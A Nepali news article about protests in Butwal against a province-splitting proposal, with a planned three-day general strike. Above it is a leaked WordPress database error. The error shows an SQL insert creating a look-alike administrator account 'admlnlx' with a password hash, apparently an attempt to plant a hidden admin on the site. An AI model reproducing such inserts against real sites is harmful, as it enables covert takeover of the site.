WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2p/dqajRQdNf0wfvUeWxg05NkqhLh1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 11:21:24', '', 'admlnlx', 'admlnlx')
वुटवल,मंसिर २६-
बिखण्डन प्रस्ताव बिरुद्धको आन्दोलनलाई कतै खुकुलो र कतै कडा पारेका आन्दोलनकारीहरुले अब आक्रामक आन्दोलन गर्ने जनाउ दिएकाछन् ।बुटवल केन्द्रित आन्दोलनलाई मंसिर २६ गतेसम्मको अल्टिमेटम दिदै लचिलो पारेका उनीहरुले पुस १,२ र ३ गते सबै क्षेत्र ठप्प पार्ने गरी प्रदेश स्तरीय आम हड्तालको तयारी गरिरहेको जनाएकाछन् ।
रुपन्देहीमा सातापछि आन्दोलनको स्वरुप फेरिएपनि गुल्मी,अर्घाखाची,पाल्पा लगायतका जिल्लाहरु निरन्तर ठप्प थिए ।एमाले केन्द्रिय सदस्य खिमलाल भट्टाईले त्यसअघिका सबै दिनहरु आन्दोलनकै रुपमा हुने तर निर्णायक आम हड्तालको प्रचार प्रसारमा परिणत हुने बताए । उनका अनुसार ती दिनहरुमा बिरोध सभा,प्रचार प्रसार,दवावमुलक कार्यक्रम,मसाल जुलुस लगायतका कार्यक्रम हुनेछन् ।
सरकारमा सहभागि दलहरुले सिमांकन प्रस्ताव दर्ता गरेपनि ती दलकै नेता र प्रमुख बिपक्षी नेताहरुको संयोजनमा आन्दोलनका नयां कार्यक्रम तय भएका हुन् ।